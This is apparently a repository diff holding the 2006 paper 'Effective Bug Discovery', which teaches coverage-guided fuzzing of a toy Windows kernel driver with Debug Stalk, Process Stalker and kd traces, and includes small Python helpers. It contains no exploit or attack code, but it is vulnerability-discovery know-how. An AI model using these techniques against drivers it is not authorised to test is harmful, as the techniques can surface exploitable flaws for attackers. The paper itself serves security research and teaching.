accessed Sep 5, 2006.
|
||||
|
||||
|
||||
Microsoft Corporation. /GS (Buffer Security Check)
|
||||
|
||||
http://msdn2.microsoft.com/en-us/library/8dbf701c.aspx;
|
||||
accessed Sep 5, 2006.
|
||||
|
||||
|
||||
Nagy, Ben. SEH (Structured Exception Handling) Security
|
||||
Changes in XPSP2 and 2003 SP1.
|
||||
|
||||
http://www.eeye.com/html/resources/newsletters/vice/VI20060830.html#vexposed;
|
||||
accessed Sep 8, 2006.
|
||||
|
||||
|
||||
Pietrek, Matt. A Crash Course on the Depths of Win32
|
||||
Structured Exception Handling.
|
||||
|
||||
http://www.microsoft.com/msj/0197/exception/exception.aspx;
|
||||
accessed Sep 8, 2006.
|
||||
|
||||
|
||||
skape. Improving Automated Analysis of Windows x64
|
||||
Binaries.
|
||||
http://www.uninformed.org/?v=4&a=1&t=sumry; accessed
|
||||
Sep 5, 2006.
|
||||
|
||||
|
||||
Wehnus. WehnTrust.
|
||||
http://www.wehnus.com/products.pl; accessed Sep 5,
|
||||
2006.
|
||||
|
||||
|
||||
Wikipedia. Matryoshka Doll.
|
||||
http://en.wikipedia.org/wiki/Matryoshka_doll;
|
||||
accessed Sep 18, 2006.
|
||||
|
||||
|
||||
Wine. CompilerExceptionSupport.
|
||||
http://wiki.winehq.org/CompilerExceptionSupport;
|
||||
accessed Sep 5, 2006.
|
||||
|
||||
|
||||
|
659
uninformed/5.3.txt
Normal file
|
@ -0,0 +1,659 @@
|
|||
Effective Bug Discovery
|
||||
9/2006
|
||||
vf
|
||||
vf@nologin.org
|
||||
|
||||
|
||||
"If we knew what it was we were doing, it would not be
|
||||
called research, would it?"
|
||||
|
||||
- Albert Einstein
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: Sophisticated methods are currently being developed and
|
||||
implemented for mitigating the risk of exploitable bugs. The process of
|
||||
researching and discovering vulnerabilities in modern code will require
|
||||
changes to accommodate the shift in vulnerability mitigations. Code
|
||||
coverage analysis implemented in conjunction with fuzz testing reveals
|
||||
faults within a binary file that would have otherwise remained
|
||||
undiscovered by either method alone. This paper suggests a research
|
||||
method for more effective runtime binary analysis using the
|
||||
aforementioned strategy. This study presents empirical evidence that
|
||||
despite the fact that bug detection will become increasingly difficult
|
||||
in the future, analysis techniques have an opportunity to evolve
|
||||
intelligently.
|
||||
|
||||
Disclaimer: Practices and material presented within this paper are meant
|
||||
for educational purposes only. The author does not suggest using this
|
||||
information for methods which may be deemed unacceptable. The content in
|
||||
this paper is considered to be incomplete and unfinished, and therefore
|
||||
some information in this paper may be incorrect or inaccurate.
|
||||
Permission to make digital or hard copies of all or part of this work
|
||||
for personal or classroom use is granted without fee provided that
|
||||
copies are not made or distributed for profit or commercial advantage
|
||||
and that copies bear this notice and the full citation on the first
|
||||
page. To copy otherwise, or to republish, requires prior specific
|
||||
permission.
|
||||
|
||||
Prerequisites: For an in-depth understanding of the concepts presented
|
||||
in this paper, a familiarity with Microsoft Windows device drivers,
|
||||
working with x86 assembler, debugging fundamentals, and the Windows
|
||||
kernel debugger is required. A brief introduction to the current state
|
||||
of code coverage analysis, including related uses, is provided to
|
||||
support information presented within this paper. However, to implement
|
||||
the practices within this paper, a deeper knowledge of the aforementioned
vulnerability discovery methods and methodologies is required. The
|
||||
following software and knowledge of its use is required to follow along
|
||||
with the discussion: IDA Pro, Debugging Tools for Windows, Debug Stalk,
|
||||
and a virtual machine such as VMware or Virtual PC.
|
||||
|
||||
Thanks: The author would like to thank west, icer, skape, Uninformed,
|
||||
and mom.
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
|
||||
2.1) The status of vulnerability research
|
||||
|
||||
Researchers employ a myriad of investigative techniques in the quest for
|
||||
vulnerabilities. In any case, there exists no silver bullet for the
|
||||
discovery of security related software bugs, not to mention the fact
|
||||
that several new security oriented kernel-mode components have recently
|
||||
been integrated into Microsoft operating systems that can make
|
||||
vulnerability investigations more difficult. Vista, particularly on the
|
||||
64-bit edition, is integrating several mechanisms including driver
|
||||
signing, Secure Bootup using a TPM hardware chip, PatchGuard,
|
||||
kernel-mode integrity checks, and restricted user-mode access to . The
|
||||
Vista kernel also has an improved Low Fragmentation Heap and Address
|
||||
Space Layout Randomization. In earlier days, bugs were revealed via dumb
|
||||
fuzzing techniques, whereas the more complicated bugs found this year
indicate that discovering them requires an advanced understanding of the
format and its parser. Because of this, researchers are moving
|
||||
towards different discovery methods such as intelligent, rather than
|
||||
dumb, testing of drivers and applications.
|
||||
|
||||
|
||||
2.2) The problem with fuzzing
|
||||
|
||||
To compound the conception that these environments are becoming more
|
||||
difficult to test, monolithic black box fuzz testing, while frequently
|
||||
efficacious in its purpose, has a tendency to exhibit a lack of
|
||||
potency. The term ``monolithic'' is included as a reference to a
|
||||
comprehensive execution of the entire application or driver. Fuzzing is
|
||||
often executed in an environment where the tester does not know the
|
||||
internals of the binary in question. This leads to disadvantages in
|
||||
which a large number of tests must be executed to get an accurate
|
||||
estimate of a binary's reliability. This investigation can be a daunting
|
||||
task if not implemented in a constructive manner. The test program and
|
||||
data selection should ensure independence from unrelated tests or groups
|
||||
of tests, thereby gaining the ability of complete coverage by reducing
|
||||
dependency on specific variables and their decision branching.
|
||||
|
||||
Another disadvantage of monolithic black box fuzz testing is that it is
|
||||
difficult to provide coverage analysis even though the testing selection
|
||||
may cover the entire suite of security testing models. A further
|
||||
complication with this kind of testing is cyclic dependency, which causes
cyclic arguments and in turn reduces coverage
assurance.
|
||||
|
||||
|
||||
2.3) Expectations
|
||||
|
||||
This paper aims to educate the reader on the espousal of code coverage
|
||||
analysis and fuzzing philosophy presented by researchers as a means to
|
||||
lighten the burden of bug detection. A kernel mode device driver will be
|
||||
fuzzed for bugs using a standard fuzzing method. Results from the
|
||||
initial fuzzing test will be examined to determine coverage. The fuzz
|
||||
testing method will then be revised to address coverage concerns, and an
execution graph will be generated to view the results of the previous
testing. Finally, the two testing methods will be compared
to show how code coverage analysis through kernel
mode Stalking can improve fuzzing endeavors.
|
||||
|
||||
|
||||
3) QA
|
||||
|
||||
Before understanding how the methodologies presented in this paper can
|
||||
be used, a few simple definitions and descriptions are addressed for the
|
||||
benefit of the reader.
|
||||
|
||||
|
||||
3.1) What is code coverage?
|
||||
|
||||
Code coverage, as represented by a Control Flow Graph (CFG), is defined
|
||||
as a measure of the exercised code within a program undergoing software
|
||||
testing. For the purpose of vulnerability research, the goal is to
|
||||
utilize code coverage analysis to obtain an exhaustive execution of all
|
||||
possible paths through code and data flow that may be relevant for
|
||||
revealing failures. It is a useful metric for determining how well a
specific set of tests can uncover faults. Techniques of proper
|
||||
code coverage analysis presented in this paper utilize basic
|
||||
mathematical properties of graph theory by including elements such as
|
||||
vertices, links and edges. Graph theory had lain somewhat dormant until
it was recently taken up by computer scientists, who have subsequently
defined their own vocabulary for the subject. For the sake of
|
||||
research continuity and to link mathematical to computer science
|
||||
definitions, the verbiage used within this paper will equate vertices to
|
||||
code blocks, branches to decisions, and edges to code paths.
|
||||
|
||||
To support our hypothesis, the aforementioned graph theory elements are
|
||||
compiled into CFGs. Informally, a Control Flow Graph is a directed graph
|
||||
composed of a finite set of vertices connected by edges indicating all
|
||||
possible routes a driver or application may take during execution. In
|
||||
other words, a CFG is merely blocks of code whose connected flow paths
|
||||
are determined by decisions. A block consists of a sequence of
instructions that is free of branching or other control transfers
except for the last instruction. That last instruction may be a branch or
decision, which consists of a Boolean expression in a control structure. A path is a
|
||||
sequence of nodes traveled through by a series of uninterrupted links.
|
||||
Paths enable flow of information or data through code. In our case, a
|
||||
path is an execution flow and is therefore essential to measuring code
|
||||
coverage. Because of this factor, this investigation focuses directly on
|
||||
determining which paths have been traversed, which blocks and
|
||||
correlating data have been executed, and which links have been followed
|
||||
and finally applying it to fuzzing techniques.
|
||||
|
||||
The purpose of code coverage analysis is ultimately to require all
|
||||
control decisions to be exercised. In other words, the application
|
||||
needs to be executed thoroughly using enough inputs that all edges in
|
||||
the graph are traversed at least once. These graphs will be represented
|
||||
as diagrams in which blocks are squares, edges are lines, and paths are
|
||||
colored.
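
To make the edge-coverage goal concrete, the sketch below models a small CFG
as an adjacency list and reports which edges a set of execution traces has
traversed. The block names and the traces are hypothetical and are not taken
from any real driver; this is an illustrative model, not the output of the
tools discussed later.

```python
# Hypothetical CFG: each block maps to the blocks it can transfer control to.
cfg = {
    "entry": ["check_magic"],
    "check_magic": ["parse", "reject"],
    "parse": ["exit"],
    "reject": ["exit"],
    "exit": [],
}


def all_edges(graph):
    """Every (source, destination) edge in the graph."""
    return {(src, dst) for src, dsts in graph.items() for dst in dsts}


def edges_in_trace(trace):
    """Edges followed by one execution, given the ordered list of blocks hit."""
    return set(zip(trace, trace[1:]))


def coverage(graph, traces):
    """Return (covered_edges, missed_edges) for a collection of traces."""
    edges = all_edges(graph)
    hit = set()
    for trace in traces:
        hit |= edges_in_trace(trace)
    hit &= edges  # ignore anything that is not an edge of the graph
    return hit, edges - hit


# A single run in which the magic check failed.
covered, missed = coverage(cfg, [["entry", "check_magic", "reject", "exit"]])
print(len(covered), "of", len(all_edges(cfg)), "edges covered")
print("missed:", sorted(missed))
```

The missed edges identify the decision whose other outcome has never been
exercised, which is the information needed to revise the test inputs.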
|
||||
|
||||
|
||||
4) Hypothesis: Code Coverage and Fuzzing
|
||||
|
||||
In the security arena, fuzzing has traditionally manifested potential
|
||||
security holes by throwing random garbage at a target, hoping that any
|
||||
given code path will fail in the process of consuming the aforementioned
|
||||
data. The probability of execution flowing through a particular block of
code is the sum, over every path leading to that block, of the product of
the probabilities of the conditional branches taken along that path. Put
simply, if there are areas of code that are never
|
||||
executed during typical fuzz testing, then administering code coverage
|
||||
methodologies will reveal those unexecuted branches. Graphical code
|
||||
coverage analysis using CFGs helps determine which code path has been
|
||||
executed even without the use of symbol tables. This process allows the
|
||||
tester to more easily identify branch execution, and to subsequently
|
||||
design fuzz testing methods to properly attain complete code coverage.
|
||||
Prior experiments aimed at determining the effectiveness of code
coverage techniques indicate that ensuring branch execution coverage
|
||||
will improve the likelihood of discovery of binary faults.
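
One way to make the probability argument concrete is to attach a probability
to each conditional branch and, for a given block, add up the product of the
branch probabilities along every path that reaches it. The sketch below does
this for a small acyclic graph. The block names and probabilities are
hypothetical; for instance, the 1/256 figure assumes a one-byte magic value
compared against uniformly random input.

```python
from fractions import Fraction

# Hypothetical CFG: block -> list of (successor, probability of that branch).
cfg = {
    "entry": [("check_magic", Fraction(1))],
    "check_magic": [("parse", Fraction(1, 256)), ("reject", Fraction(255, 256))],
    "parse": [("copy", Fraction(1, 2)), ("exit", Fraction(1, 2))],
    "copy": [("exit", Fraction(1))],
    "reject": [("exit", Fraction(1))],
    "exit": [],
}


def reach_probability(graph, block, target):
    """Probability that execution starting at block reaches target.

    Sums, over every path, the product of the branch probabilities.
    Only valid for acyclic graphs.
    """
    if block == target:
        return Fraction(1)
    total = Fraction(0)
    for successor, probability in graph.get(block, []):
        total += probability * reach_probability(graph, successor, target)
    return total


p_copy = reach_probability(cfg, "entry", "copy")
print("chance one random input reaches 'copy':", p_copy)
```

A block guarded by several unlikely branches is reached by random input only
rarely, which is why coverage data is useful for steering the fuzzer toward it.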
|
||||
|
||||
|
||||
4.1) Process and Kernel Stalking
|
||||
|
||||
One of the more difficult questions to answer when testing software for
|
||||
vulnerabilities is: ``when is the testing considered finished?'' How do
|
||||
we, as vulnerability bug hunters, know when we have completed our
|
||||
testing cycle by exhausting all code paths and discovering all possible
|
||||
bugs? Because fuzz testing is often random, and therefore unpredictable, the
question of when to conclude testing is often left unanswered.
|
||||
|
||||
Pedram Amini, who recently released ``Paimei'', coined the term "Process
|
||||
Stalking" as a set of runtime binary analysis tools intended to enhance
|
||||
the visual effect of runtime analysis. His tool includes an IDA Pro
|
||||
plug-in paired with GML graph files for easy viewing. His strategy
|
||||
amalgamates the processes of runtime profiling through tracing and state
|
||||
mapping, which is a graphic model composed of behavior states of a
|
||||
binary. Pedram Amini's "Process Stalker" tool suite can be found on his
|
||||
personal website (http://pedram.redhive.com) and the reverse engineering
|
||||
website OpenRCE (http://www.openrce.org).
|
||||
|
||||
|
||||
4.2) Stalking and Fuzzing Go Hand in Hand
|
||||
|
||||
Process Stalker was transformed by an individual into a windbg extension
|
||||
for use in debugging user-mode and kernel-mode scenarios. This tool was
|
||||
given the title ``Debug Stalk,'' and until now this tool has remained
|
||||
unreleased. Process and Debug Stalker have overcome the static analysis
|
||||
visualization setback by implementing runtime binary analysis. Runtime
|
||||
analysis using Process and Debug Stalking in conjunction with
|
||||
mathematically enhanced CFGs substantially improves bug hunting with
fuzzing techniques. Users can graphically determine via
|
||||
runtime analysis which paths have not been traversed and which blocks
|
||||
have not been executed. The user then has the opportunity to refine
|
||||
their testing approach to one that is more effective. When testing a
|
||||
large application, this technique dramatically reduces the overall
|
||||
workload of said scenarios. Therefore, iterations of the Process Stalk
|
||||
tool and the Debug Stalk tool will be used for investigating a faulty
|
||||
driver in this paper.
|
||||
|
||||
Debug Stalk is a Windows debugger plug-in that can be used in places
|
||||
where Process Stalking may not be suited, such as in a kernel-mode
|
||||
setting.
|
||||
|
||||
|
||||
5) Implementation
|
||||
|
||||
For the mere sake of simple illustration, several tools have been
|
||||
created for testing our code coverage theories. Some of the test cases
|
||||
have been exaggerated and are not real world examples. This testing
|
||||
implementation is broken down into three parts: Part I includes sending
|
||||
garbage to the device driver with dumb fuzzing; Part II will include
|
||||
smarter fuzzing; Part III is a breakdown of how an intelligent level of
|
||||
fuzzing helps improve code coverage while testing. First, a very simple
|
||||
device driver named pluto.sys was created for the purpose of this paper.
|
||||
It contains several blocks of code with decision based branching that
|
||||
will be fuzzed. The fuzzer will send iterations of random data to
|
||||
pluto.sys. After fuzzing has completed, a post-analysis tool will review
|
||||
executed code blocks within the driver. Part II will contain the same
|
||||
process as Part I; however, it will include an updated fuzzer based on
|
||||
our Part I post-analysis that will allow the driver to call into a
|
||||
previously unexecuted code region. Part III uses the data collected in
|
||||
Parts I and II as an illustrative example in support of the thesis that
code coverage analysis is beneficial.
|
||||
|
||||
|
||||
5.1) Stalking Setup
|
||||
|
||||
Several software components need to be acquired before Stalking can
|
||||
begin: the Debug Stalk extension, Pedram's Process Stalker, Python, and
|
||||
the GoVisual Diagram Editor (GDE). Pedram's Stalker is listed on both
|
||||
his blog and on the OpenRCE website. The Process Stalker contains files
|
||||
such as the IDA Pro plug-in, and Python scripts that generate the GML
|
||||
graph files that will be imported into GDE. GDE provides a functional
|
||||
mechanism for editing and positioning of graphs including clustered
|
||||
graphing, creation and deletion of nodes, zooming and scrolling,
|
||||
and automatic graph layout. Components can be obtained at the following
|
||||
locations:
|
||||
|
||||
GDE: http://www.oreas.com/gde_en.php
|
||||
Python: http://www.python.org/download
|
||||
Proc Stalker: http://www.openrce.org/downloads/details/171/Process_Stalker
|
||||
Debug Stalk: http://www.nologin.org/code
|
||||
|
||||
|
||||
5.2) Installing the Stalker
|
||||
|
||||
A walkthrough of installation for Process Stalker and required
|
||||
components will be covered briefly in this document; however, more
|
||||
detailed steps and descriptions are provided in Pedram's supporting
|
||||
manual. The IDA plug-in generates a .bpl file containing a
breakpoint list with entries for each block. The IDA plug-in
|
||||
processstalker.plw must be inserted into the IDA Pro plug-ins directory.
|
||||
Restarting IDA will allow the application to load the plug-in. A
|
||||
successful installation of the IDA plug-in in the log window will be
|
||||
similar to the following:
|
||||
|
||||
|
||||
[*] pStalker> Process Stalker – Profiler
|
||||
[*] pStalker> Pedram Amini <pedram.amini@gmail.com>
|
||||
[*] pStalker> Compiled on Sep 21 2006
|
||||
|
||||
|
||||
Generating a .bpl file can be started by pressing Alt+5 within the IDA
|
||||
application. A dialog appears. Make sure that ``Enable Instruction
|
||||
Colors,'' ``Enable Comments,'' and ``Allow Self Loops'' are all
|
||||
selected. Pressing OK will prompt for a ``Save as'' dialog. The .bpl
|
||||
file must be named relative to its given name. For example, if calc.exe
|
||||
is being watched, the file name must be calc.exe.bpl. In our case,
|
||||
pluto.sys is being watched, so the file name must be pluto.sys.bpl. A
|
||||
successful generation of a .bpl file will produce the following output
|
||||
in the log window:
|
||||
|
||||
|
||||
[*] pStalker> Profile analysis 25% complete.
|
||||
[*] pStalker> Profile analysis 50% complete.
|
||||
[*] pStalker> Profile analysis 75% complete.
|
||||
[*] pStalker> Profile analysis 100% complete.
|
||||
|
||||
|
||||
Opening the pluto.sys.bpl file will show that records are colon
|
||||
delimited:
|
||||
|
||||
|
||||
pluto.sys:0000002e:0000002e
|
||||
pluto.sys:0000006a:0000006a
|
||||
pluto.sys:0000007c:0000007c
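
For post-processing, records in this shape are straightforward to read back.
The following is a minimal sketch that assumes each record is a module name
followed by two hexadecimal offsets; the meaning of the two offsets is not
stated here, so the field names first_offset and second_offset are
placeholders rather than Process Stalker terminology.

```python
from typing import NamedTuple


class BplRecord(NamedTuple):
    module: str
    first_offset: int   # placeholder name; meaning assumed, not documented here
    second_offset: int  # placeholder name; meaning assumed, not documented here


def parse_bpl(text):
    """Parse colon-delimited breakpoint list records, skipping blank lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        # Split from the right so only the last two fields are treated as offsets.
        module, first, second = line.rsplit(":", 2)
        records.append(BplRecord(module, int(first, 16), int(second, 16)))
    return records


sample = """pluto.sys:0000002e:0000002e
pluto.sys:0000006a:0000006a
pluto.sys:0000007c:0000007c"""

records = parse_bpl(sample)
for record in records:
    print(record.module, hex(record.first_offset), hex(record.second_offset))
```

Parsing the offsets as integers makes it easy to compare the full breakpoint
list against the subset of breakpoints that were hit during a run.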
|
||||
|
||||
|
||||
5.3) Installing Debug Stalk
|
||||
|
||||
|
||||
The Debug Stalk extension can be built as follows. Open the Windows
|
||||
2003 Server Build Environment window. Set the DBGSDK_INC_PATH and
|
||||
DBGSDK_LIB_PATH environment variables to specify the paths to the
|
||||
debugger SDK headers and the debugger SDK libraries, respectively. If
|
||||
the SDK is installed at c:\WINDBGSDK, the following would work:
|
||||
|
||||
|
||||
set DBGSDK_INC_PATH=c:\WINDBGSDK\inc
|
||||
set DBGSDK_LIB_PATH=c:\WINDBGSDK\lib
|
||||
|
||||
|
||||
This may vary depending on where the SDK is installed. The directory
|
||||
name must not contain a space (' ') in its path. The next step is to
|
||||
change directories to the project directory. If Debug Stalk source
|
||||
code is placed within the samples directory within the SDK (located
|
||||
at c:\WINDBGSDK), then the following should work:
|
||||
|
||||
|
||||
cd c:\WINDBGSDK\samples\dbgstalk-0.0.18
|
||||
|
||||
|
||||
Type build -cg at the command line to build the Debug Stalk project.
|
||||
Copy the dbgstalk.dll module from within this distribution to the root
|
||||
folder of the Debugging Tools for Windows installation. This is the
|
||||
folder containing programs like cdb.exe and windbg.exe. If you have a
|
||||
default installation of "Debugging tools for Windows" already installed,
|
||||
the following should work:
|
||||
|
||||
|
||||
copy dbgstalk.dll "c:\Program Files\Debugging Tools for Windows\"
|
||||
|
||||
|
||||
The debugger plug-in should be installed at this point. It is important
|
||||
to note that Debug Stalk is a fairly new tool and has some reliability
|
||||
issues. It is a bit flaky, and some hacking may be necessary in order to
|
||||
get it running properly.
|
||||
|
||||
|
||||
5.4) Stalking with Kernel Debug
|
||||
|
||||
|
||||
5.4.1) Part I
|
||||
|
||||
For testing purposes, a Microsoft Operating System needs to be set up
|
||||
inside of a Virtual PC environment. Load the pluto.sys driver inside of
|
||||
the Virtual PC and attach a debug session via Kernel Debug (kd). Once kd
|
||||
is loaded and attached to a process within the Virtual Machine, Debug
|
||||
Stalk can be invoked by calling "!dbgstalk.dbgstalk [switches] [.bpl
|
||||
file path]" at the kd console. For example:
|
||||
|
||||
|
||||
C:\Uninformed>kd -k com:port=\\.\pipe\woo,pipe
|
||||
|
||||
Microsoft (R) Windows Debugger Version 6.6.0007.5
|
||||
Copyright (c) Microsoft Corporation. All rights reserved.
|
||||
|
||||
Opened \\.\pipe\woo
|
||||
Waiting to reconnect...
|
||||
Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE
|
||||
Kernel Debugger connection established.
|
||||
Windows XP Kernel Version 2600 (Service Pack 2) UP Free x86 compatible
|
||||
Product: WinNt, suite: TerminalServer SingleUserTS
|
||||
Built by: 2600.xpsp_sp2_rtm.040803-2158
|
||||
Kernel base = 0x804d7000 PsLoadedModuleList = 0x8055ab20
|
||||
Debug session time: Sat Sep 23 14:40:24.522 2006 (GMT-7)
|
||||
System Uptime: 0 days 0:06:50.610
|
||||
Break instruction exception - code 80000003 (first chance)
|
||||
nt!DbgBreakPointWithStatus+0x4:
|
||||
804e3b25 cc int 3
|
||||
kd> .reload
|
||||
Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE
|
||||
Loading Kernel Symbols
|
||||
.......................................................
|
||||
Loading User Symbols
|
||||
|
||||
Loading unloaded module list
|
||||
...........
|
||||
kd> !dbgstalk.dbgstalk -o -b c:\Uninformed\pluto.sys.bpl
|
||||
[*] - Entering Stalker
|
||||
[*] - Break Point List.....: c:\Uninformed\pluto.sys.bpl
|
||||
[*] - Breakpoint Restore...: OFF
|
||||
[*] - Register Enumerate...: ON
|
||||
[*] - Kernel Stalking:.....: ON
|
||||
|
||||
current context:
|
||||
|
||||
eax=00000001 ebx=ffdff980 ecx=8055192c edx=000003f8 esi=00000000 edi=f4be2de0
|
||||
eip=804e3b25 esp=80550830 ebp=80550840 iopl=0 nv up ei pl nz na po nc
|
||||
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202
|
||||
nt!RtlpBreakWithStatusInstruction:
|
||||
804e3b25 cc int 3
|
||||
|
||||
commands:
|
||||
|
||||
[m] module list [0-9] enter recorder modes
|
||||
[x] stop recording [v] toggle verbosity
|
||||
[q] quit/close
|
||||
|
||||
|
||||
Once Debug Stalk is loaded, a list of commands is available to the user. A
|
||||
breakdown of the command line options offered by Debug Stalk is as follows:
|
||||
|
||||
|
||||
[m] module list
|
||||
[0-9] enter recorder modes
|
||||
[x] stop recording
|
||||
[v] toggle verbosity
|
||||
[q] quit/close
|
||||
|
||||
|
||||
At this point, the fuzz tool needs to be executed to send random data
|
||||
to the device driver. While the fuzzer is running, Debug Stalk will print out
|
||||
information to kd. Pressing 'g' at the command line prompt will resume
|
||||
execution of the target machine. This invocation will look something like
|
||||
this:
|
||||
|
||||
|
||||
kd> g
|
||||
[*] - Recorder Opened......: pluto.sys.0
|
||||
[*] - Recorder Opened......: pluto.sys-regs.0
|
||||
Modload: Processing breakpoints for module pluto.sys at f7a7f000
|
||||
Modload: Done. 46 of 46 breakpoints were set.
|
||||
0034c883 T:00000001 [bp] f7a83000 a10020a8f7 mov eax,dword ptr [pluto+0x3000 (f7a82000)]
|
||||
0034ed70 T:00000001 [bp] f7a8300e 3bc1 cmp eax,ecx
|
||||
0034eded T:00000001 [bp] f7a83012 a12810a8f7 mov eax,dword ptr [pluto+0x2028 (f7a81028)]
|
||||
0034ee89 T:00000001 [bp] f7a8302b e9aed1ffff jmp pluto+0x11de (f7a801de)
|
||||
0034ef16 T:00000001 [bp] f7a801de 55 push ebp
|
||||
0034ef93 T:00000001 [bp] f7a80219 8b45fc mov eax,dword ptr [ebp-4]
|
||||
0034f03f T:00000001 [bp] f7a80253 6844646b20 push 206B6444h
|
||||
0034f0cb T:00000001 [bp] f7a802a2 b980000000 mov ecx,80h
|
||||
0034f148 T:00000001 [bp] f7a802ab 5f pop edi
|
||||
00359086 T:00000001 [bp] f7a8006a 8b4c2408 mov ecx,dword ptr [esp+8]
|
||||
0035920c T:00000001 [bp] f7a800f6 833d0420a8f700 cmp dword ptr [pluto+0x3004 (f7a82004)],0
|
||||
003592a9 T:00000001 [bp] f7a8010c 8b7760 mov esi,dword ptr [edi+60h]
|
||||
00359345 T:00000001 [bp] f7a80114 8b4704 mov eax,dword ptr [edi+4]
|
||||
003593e1 T:00000001 [bp] f7a80122 6a10 push 10h
|
||||
0035945e T:00000001 [bp] f7a80133 85c0 test eax,eax
|
||||
003594eb T:00000001 [bp] f7a80147 ff7604 push dword ptr [esi+4]
|
||||
00359587 T:00000001 [bp] f7a80176 8bcf mov ecx,edi
|
||||
00359614 T:00000001 [bp] f7a80182 5f pop edi
|
||||
0035ac5b T:00000001 [bp] f7a8002e 55 push ebp
|
||||
|
||||
current context:
|
||||
|
||||
eax=00000001 ebx=0000c271 ecx=8055192c edx=000003f8 esi=00000001 edi=291f0c30
|
||||
eip=804e3b25 esp=80550830 ebp=80550840 iopl=0 nv up ei pl nz na po nc
|
||||
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202
|
||||
nt!RtlpBreakWithStatusInstruction:
|
||||
804e3b25 cc int 3
|
||||
|
||||
|
||||
commands:
|
||||
|
||||
[m] module list [0-9] enter recorder modes
|
||||
[x] stop recording [v] toggle verbosity
|
||||
[q] quit/close
|
||||
|
||||
kd> q
|
||||
[*] - Exiting Stalker
|
||||
q
|
||||
|
||||
|
||||
Debug Stalk has finished Stalking the points in the driver allowed by the
|
||||
fuzzer. The files "pluto.sys.0" and (optionally) "pluto.sys-regs.0" have been
|
||||
saved to the current working directory.
|
||||
|
||||
|
||||
5.5) Analyzing the output
|
||||
|
||||
Pedram has developed a set of Python scripts to support the .bpl and recorder
|
||||
output file, such as adding register metadata to the graph, filtering generated
|
||||
breakpoint lists, additional GDE support for difficult graphs, combining
|
||||
multi-function graphs into a conglomerate graph, highlighting interesting
|
||||
blocks, importing changes made directly to the graph back into IDA, adding
|
||||
function offsets to breakpoint addresses and optionally rebasing the recording
|
||||
addresses, and much more. Pedram provides detailed descriptions and usage of
|
||||
his python scripts in his manual. The Python scripts used for formatting the
|
||||
.gml files (for block based coverage) are psprocessrecording and
|
||||
psviewrecordingfuncs. The psprocessrecording script is executed first on
pluto.sys.0, which produces another file called
pluto.sys.0.BadFuzz-processed. The psviewrecordingfuncs script is then executed
on the pluto.sys.0.BadFuzz-processed file to produce BadFuzz.gml, named after
the initial testing technique. For more information on Pedram's Python scripts,
refer to the Process Stalking Manual. Opening the resulting .gml file displays
the following graph.
|
||||
|
||||
Executed blocks are shown in pink, unexecuted blocks are shown in grey,
|
||||
paths of execution are green lines, and unexecuted paths are red lines. At this
|
||||
point it is important to note that the code block starting at address 00011169
|
||||
does not get executed. This is detrimental to our testing process because it
|
||||
appears that fuzzer supplied data is passed to it and it does not appear to get
|
||||
executed. Based on this evidence, we can conclude that a readjustment of our
|
||||
testing methodologies needs to be put in place so that we can hit that
|
||||
unexecuted block.
|
||||
|
||||
Analysis indicates that the device driver does not execute block 00011169
|
||||
because a comparison is made in the block at address 00011147 which reveals
|
||||
that [eax] does not match a specified value. Since eax is pointing to the
|
||||
fuzzer supplied data, we should be able to adjust the fuzzer to meet the
|
||||
requirement of the 00011161 cmp dword ptr [eax], 0DEADBEEFh instruction, which
|
||||
will allow us to get into block 00011169. BetterFuzz.exe is an improved fuzzer
that satisfies this comparison.
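To make the adjustment concrete, here is a minimal sketch of how a test case satisfying that comparison might be built. It is not the source of BetterFuzz.exe. It assumes the compared dword sits at the very start of the fuzzer supplied buffer (since eax points at that data), the payload length of 64 bytes is arbitrary, and actually delivering the buffer to the driver is left out.

```python
import os
import struct

MAGIC = 0xDEADBEEF  # value taken from the cmp instruction quoted above


def build_test_case(payload_len: int) -> bytes:
    """Return a buffer whose first dword is MAGIC, followed by random bytes."""
    # x86 is little-endian, so the dword is packed with "<I".
    return struct.pack("<I", MAGIC) + os.urandom(payload_len)


case = build_test_case(64)  # 64 is an arbitrary, assumed payload size
print(case[:4].hex())       # prints "efbeadde"
```

Keeping the magic value fixed while the rest of the buffer stays random lets the fuzzer pass the check and still exercise the code behind it with varied input.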
|
||||
|
||||
|
||||
5.5.1) Part II
|
||||
|
||||
Having determined that the previous testing methodology was not effective, the
test case was re-engineered so that the driver can be re-tested to hit the
missed block. Following the steps provided in Part I, the driver is loaded into
the Virtual PC, kd is attached, Debug Stalk is loaded into kd, and execution is
resumed with the 'g' command. The entire process is the same except that when
the new fuzz test is invoked, different output is printed to kd:
|
||||
|
||||
kd> g
|
||||
[*] - Recorder Opened......: pluto.sys.0
|
||||
[*] - Recorder Opened......: pluto.sys-regs.0
|
||||
Modload: Processing breakpoints for module pluto.sys at f7a27000
|
||||
Modload: Done. 46 of 46 breakpoints were set.
|
||||
004047a0 T:00000001 [bp] f7a2b000 a100a0a2f7 mov eax,dword ptr [pluto+0x3000 (f7a2a000)]
|
||||
004052bc T:00000001 [bp] f7a2b00e 3bc1 cmp eax,ecx
|
||||
00405339 T:00000001 [bp] f7a2b012 a12890a2f7 mov eax,dword ptr [pluto+0x2028 (f7a29028)]
|
||||
004053e5 T:00000001 [bp] f7a2b02b e9aed1ffff jmp pluto+0x11de (f7a281de)
|
||||
00405462 T:00000001 [bp] f7a281de 55 push ebp
|
||||
004054ee T:00000001 [bp] f7a28219 8b45fc mov eax,dword ptr [ebp-4]
|
||||
0040558b T:00000001 [bp] f7a28253 6844646b20 push 206B6444h
|
||||
00405617 T:00000001 [bp] f7a282a2 b980000000 mov ecx,80h
|
||||
00405694 T:00000001 [bp] f7a282ab 5f pop edi
|
||||
00406ccc T:00000001 [bp] f7a2806a 8b4c2408 mov ecx,dword ptr [esp+8]
|
||||
00406e04 T:00000001 [bp] f7a280f6 833d04a0a2f700 cmp dword ptr [pluto+0x3004 (f7a2a004)],0
|
||||
00406eb0 T:00000001 [bp] f7a2810c 8b7760 mov esi,dword ptr [edi+60h]
|
||||
00406f4c T:00000001 [bp] f7a28114 8b4704 mov eax,dword ptr [edi+4]
|
||||
00406ff8 T:00000001 [bp] f7a28122 6a10 push 10h
|
||||
00407075 T:00000001 [bp] f7a28133 85c0 test eax,eax
|
||||
